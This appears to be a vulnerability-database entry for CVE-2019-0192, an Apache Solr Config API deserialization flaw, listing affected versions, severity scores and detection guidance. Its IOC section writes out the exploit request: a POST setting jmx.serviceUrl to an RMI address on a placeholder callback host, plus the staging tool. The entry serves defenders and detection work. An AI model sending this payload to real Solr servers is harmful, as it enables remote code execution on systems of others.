cbcvebase.
CVE-2019-0192
published 2019-03-07

CVE-2019-0192: In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a…

PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
77.51%
99.5th percentile
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

Affected

4 ranges
VendorProductVersion rangeFixed in
apachesolr5.0.0 – 5.5.5
apachesolr6.0.0 – 6.6.5
apache_software_foundationapache_solr
debianlucene-solr

Detection & IOCsextracted from sources · hover to see the quote

urlGET /solr/admin/cores?wt=json HTTP/1.1
urlPOST /solr/{{core_name}}/config HTTP/1.1
command{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}
port8983
path/solr/admin/cores
path/solr/{{core_name}}/config
otherservice:jmx:rmi:///jndi/rmi://<host>:<port>/jmxrmi
  • Detect exploit attempts by monitoring for HTTP POST requests to /solr/<core>/config containing the 'set-property' JSON key with 'jmx.serviceUrl' pointing to an external RMI host.
  • Detect outbound RMI connections from the Solr server to unexpected external hosts, which indicates the JMX serviceUrl was successfully set to a malicious RMI listener.
  • Match on Nuclei template matchers: HTTP 500 status, response body containing 'javax.management.remote.rmi', and Content-Type 'text/plain' in combination with a POST to /solr/<core>/config.
  • Trend Micro Deep Security / Vulnerability Protection DPI rule 1009601 covers this CVE.
  • Trend Micro TippingPoint MainlineDV filter 313798 covers this CVE.
  • The ysoserial tool with the JRMPListener payload class is used to stage the malicious RMI server in exploitation of this CVE.
  • ·Affected versions are Apache Solr 5.0.0–5.5.5 and 6.0.0–6.6.5 only; versions 7.0 and later are not vulnerable.
  • ·The Nuclei template requires two sequential HTTP requests: first a GET to /solr/admin/cores to extract a valid core name, then the POST exploit to /solr/<core>/config.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8LOW
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.